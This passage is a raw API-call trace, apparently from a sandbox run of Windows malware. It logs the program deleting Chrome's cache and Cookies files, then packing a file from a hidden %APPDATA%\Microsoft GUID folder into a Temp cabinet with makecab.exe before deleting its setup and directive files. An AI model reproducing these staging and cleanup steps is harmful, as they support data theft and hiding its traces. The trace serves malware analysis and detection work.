Data\\Default\\Cache\\f_00001b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001b")) returned 1 [0254.303] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.303] lstrlenW (lpString="f_00001c") returned 8 [0254.303] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001c" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001c") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001c" [0254.303] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001c" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001c")) returned 1 [0254.305] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.305] lstrlenW (lpString="f_00001d") returned 8 [0254.305] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001d" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001d") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001d" [0254.305] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001d" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001d")) returned 1 [0254.306] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.306] lstrlenW (lpString="f_00001e") returned 8 [0254.306] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001e" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001e") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001e" [0254.306] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001e" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001e")) returned 1 [0254.307] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.307] lstrlenW (lpString="f_00001f") returned 8 [0254.307] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001f" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001f") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001f" [0254.307] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001f" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001f")) returned 1 [0254.308] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.308] lstrlenW (lpString="index") returned 5 [0254.308] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="index" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" [0254.308] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index")) returned 1 [0254.309] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 0 [0254.309] FindClose (in: hFindFile=0x442fc30 | out: hFindFile=0x442fc30) returned 1 [0254.309] lstrcpyW (in: lpString1=0x79cd8a0, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0254.309] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data\\Default\\Cookies" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" [0254.309] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cookies")) returned 0x20 [0254.310] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cookies")) returned 1 Thread: id = 110 os_tid = 0x7b8 [0252.725] lstrlenA (lpString="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 58 [0252.725] mbstowcs (in: _Dest=0x7aaecd0, _Source="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", _MaxCount=0x3b | out: _Dest="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x3a [0252.725] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0252.725] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x7aaed50, nSize=0x57 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x57 [0252.726] GetProcAddress (hModule=0x7ff975900000, lpProcName=0x5c) returned 0x7ff975b21c90 [0252.726] PathGetShortPath (in: pszLongPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" | out: pszLongPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") [0252.727] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0252.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0252.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", cchWideChar=51, lpMultiByteStr=0x7aaf430, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\x07", lpUsedDefaultChar=0x0) returned 51 [0252.860] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1")) returned 0x10 [0252.861] GetProcAddress (hModule=0x7ff977360000, lpProcName="PathIsDirectoryEmptyA") returned 0x7ff977376840 [0252.861] PathIsDirectoryEmptyA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 0 [0252.861] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0252.861] GetTempPathA (in: nBufferLength=0x26, lpBuffer=0x7aae620 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0252.861] GetTickCount () returned 0x25bc2 [0252.861] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x1152314, lpTempFileName=0x7aae620 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\2314.tmp")) returned 0x2314 [0252.861] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.tmp") returned=".tmp" [0252.862] lstrcpyA (in: lpString1=0x7aae649, lpString2=".bin" | out: lpString1=".bin") returned=".bin" [0252.862] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0252.862] lstrcpyA (in: lpString1=0x7aaecd0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" [0252.862] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpEnd=0x0, wMatch=0x5c) returned="\\{25E2F~1" [0252.862] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1")) returned 0x10 [0252.862] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0252.862] GetTempPathA (in: nBufferLength=0x26, lpBuffer=0x7aaed20 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0252.862] GetTickCount () returned 0x25bc2 [0252.862] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x1151a70, lpTempFileName=0x7aaed20 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\1a70.tmp")) returned 0x1a70 [0252.862] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.tmp") returned=".tmp" [0252.862] lstrcpyA (in: lpString1=0x7aaed49, lpString2=".bin" | out: lpString1=".bin") returned=".bin" [0252.862] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 45 [0252.862] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\1a70.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0252.865] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin", lpEnd=0x0, wMatch=0x5c) returned="\\2314.bin" [0252.865] wsprintfA (in: param_1=0x79b1400, param_2=".set MaxDiskSize=0\r\n.set DiskDirectory1=\"%s\"\r\n" | out: param_1=".set MaxDiskSize=0\r\n.set DiskDirectory1=\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\"\r\n") returned 80 [0252.865] WriteFile (in: hFile=0x8e4, lpBuffer=0x79b1400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x235fe38, lpOverlapped=0x0 | out: lpBuffer=0x79b1400*, lpNumberOfBytesWritten=0x235fe38*=0x50, lpOverlapped=0x0) returned 1 [0252.866] wsprintfA (in: param_1=0x79b1400, param_2=".set CabinetName1=\"%s\"\r\n" | out: param_1=".set CabinetName1=\"2314.bin\"\r\n") returned 30 [0252.866] WriteFile (in: hFile=0x8e4, lpBuffer=0x79b1400*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x235fe38, lpOverlapped=0x0 | out: lpBuffer=0x79b1400*, lpNumberOfBytesWritten=0x235fe38*=0x1e, lpOverlapped=0x0) returned 1 [0252.866] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1")) returned 0x10 [0252.866] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0252.866] mbstowcs (in: _Dest=0x7aaedc0, _Source="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", _MaxCount=0x34 | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 0x33 [0252.866] lstrcatW (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpString2="\\" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\" [0252.866] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35 [0252.866] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\", lpDst=0x7aaf0a0, nSize=0x35 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\") returned 0x35 [0252.866] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\") returned 52 [0252.866] lstrlenW (lpString="*.*") returned 3 [0252.866] PathCombineW (in: pszDest=0x7aaf120, pszDir="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\", pszFile="*.*" | out: pszDest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*.*") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*.*" [0252.866] FindFirstFileW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*.*", lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 0x442f930 [0252.866] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 1 [0252.866] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0252.866] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 1 [0252.866] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0252.866] lstrlenW (lpString="01D4756785E0F97F09") returned 18 [0252.866] lstrlenW (lpString="*.*") returned 3 [0252.866] wcscpy (in: _Dest=0x79c8988, _Source="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\" | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\" [0252.867] StrRChrW (lpStart="*.*", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0252.867] PathCombineW (in: pszDest=0x79c8988, pszDir="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\", pszFile="01D4756785E0F97F09" | out: pszDest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\01D4756785E0F97F09") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\01D4756785E0F97F09" [0252.867] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 0 [0252.867] FindClose (in: hFindFile=0x442f930 | out: hFindFile=0x442f930) returned 1 [0252.867] PathCombineW (in: pszDest=0x7aaf120, pszDir="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\", pszFile="*" | out: pszDest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*" [0252.867] FindFirstFileW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\*", lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 0x442f570 [0252.867] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 1 [0252.867] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0252.867] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 1 [0252.867] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0252.867] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x7aaee40 | out: lpFindFileData=0x7aaee40) returned 0 [0252.867] FindClose (in: hFindFile=0x442f570 | out: hFindFile=0x442f570) returned 1 [0252.867] GetFileAttributesW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\01D4756785E0F97F09" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\01d4756785e0f97f09")) returned 0x20 [0252.867] StrRChrW (lpStart="01D4756785E0F97F09", lpEnd=0x0, wMatch=0xc005c) returned 0x0 [0252.867] wsprintfA (in: param_1=0x79b1400, param_2=".set DestinationDir=\"%S\"\r\n" | out: param_1=".set DestinationDir=\"\"\r\n") returned 24 [0252.867] WriteFile (in: hFile=0x8e4, lpBuffer=0x79b1400*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x235fe38, lpOverlapped=0x0 | out: lpBuffer=0x79b1400*, lpNumberOfBytesWritten=0x235fe38*=0x18, lpOverlapped=0x0) returned 1 [0252.868] wsprintfA (in: param_1=0x79b1400, param_2="\"%S\"\r\n" | out: param_1="\"01D4756785E0F97F09\"\r\n") returned 22 [0252.868] WriteFile (in: hFile=0x8e4, lpBuffer=0x79b1400*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x235fe38, lpOverlapped=0x0 | out: lpBuffer=0x79b1400*, lpNumberOfBytesWritten=0x235fe38*=0x16, lpOverlapped=0x0) returned 1 [0252.868] CloseHandle (hObject=0x8e4) returned 1 [0252.868] wsprintfA (in: param_1=0x7aaed70, param_2="makecab.exe /F \"%s\"" | out: param_1="makecab.exe /F \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin\"") returned 62 [0252.868] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0252.868] mbstowcs (in: _Dest=0x79b3fd0, _Source="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", _MaxCount=0x34 | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 0x33 [0252.869] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x34 [0252.869] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpDst=0x79b3be0, nSize=0x34 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 0x34 [0252.869] PathGetShortPath (in: pszLongPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1" | out: pszLongPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") [0252.869] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0252.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0252.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", cchWideChar=51, lpMultiByteStr=0x7aaedc0, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpUsedDefaultChar=0x0) returned 51 [0252.869] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="makecab.exe /F \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0xc000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpStartupInfo=0x235fda0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x235fd70 | out: lpCommandLine="makecab.exe /F \"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin\"", lpProcessInformation=0x235fd70*(hProcess=0x930, hThread=0x12c4, dwProcessId=0x200, dwThreadId=0x20c)) returned 1 [0253.062] WaitForMultipleObjects (nCount=0x2, lpHandles=0x235fd88*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0256.879] GetExitCodeProcess (in: hProcess=0x930, lpExitCode=0x235fe30 | out: lpExitCode=0x235fe30*=0x0) returned 1 [0256.879] CloseHandle (hObject=0x12c4) returned 1 [0256.879] CloseHandle (hObject=0x930) returned 1 [0256.879] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1") returned 51 [0256.879] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpString2="\\setup.inf" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf" [0256.879] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf") returned 61 [0256.879] mbstowcs (in: _Dest=0x7aae530, _Source="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf", _MaxCount=0x3e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf") returned 0x3d [0256.879] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3e [0256.879] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf", lpDst=0x7aaeab0, nSize=0x3e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf") returned 0x3e [0256.879] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.inf" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.inf")) returned 1 [0256.881] lstrcatA (in: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1", lpString2="\\setup.rpt" | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt") returned="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt" [0256.881] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt") returned 61 [0256.881] mbstowcs (in: _Dest=0x7aae530, _Source="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt", _MaxCount=0x3e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt") returned 0x3d [0256.881] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x3e [0256.881] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt", lpDst=0x7aaeab0, nSize=0x3e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt") returned 0x3e [0256.881] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\MICROS~1\\{25E2F~1\\setup.rpt" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.rpt")) returned 1 [0256.882] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 45 [0256.882] mbstowcs (in: _Dest=0x79b37f0, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _MaxCount=0x2e | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0x2d [0256.882] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x2e [0256.883] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", lpDst=0x79b3c50, nSize=0x2e | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin") returned 0x2e [0256.883] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\1a70.bin")) returned 1 [0256.884] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\2314.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x930 [0256.884] GetFileSize (in: hFile=0x930, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa1 [0256.884] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\2314.bin") returned 45 